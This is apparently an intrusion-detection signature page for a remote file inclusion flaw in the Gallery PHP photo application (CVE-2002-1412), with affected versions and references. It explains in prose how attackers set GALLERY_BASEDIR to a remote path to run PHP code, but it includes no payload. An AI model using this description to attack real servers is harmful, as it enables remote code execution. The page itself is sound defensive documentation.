Signature Detail

HTTP: PHP Gallery HTTP_VARS In URL

This signature detects attempts to exploit a known vulnerability against Gallery, a Web-based photo management application. Gallery uses the variables HTTP_POST_VARS, HTTP_GET_VARS, HTTP_COOKIE_VARS, and HTTP_POST_FILES to transfer data between pages, including the GALLERY_BASEDIR variable. Attackers can manually control these variables to include a malicious setting for GALLERY_BASEDIR; enabling them to execute arbitrary PHP code on the Gallery server with the permissions of the HTTP server.

Extended Description

Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter.

Affected Products

• Bharat Mediratta Gallery 1.1.0
• Bharat Mediratta Gallery 1.2.0
• Bharat Mediratta Gallery 1.2.1
• Bharat Mediratta Gallery 1.2.1 p1
• Bharat Mediratta Gallery 1.2.2
• Bharat Mediratta Gallery 1.2.3
• Bharat Mediratta Gallery 1.2.4
• Bharat Mediratta Gallery 1.2.5
• Bharat Mediratta Gallery 1.3.0

References

• BugTraq: 5375
• CVE: CVE-2002-1412
• URL: http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=107&sid=107
• URL: http://www.securiteam.com/unixfocus/6S00H0U8KG.html
• URL: http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=26325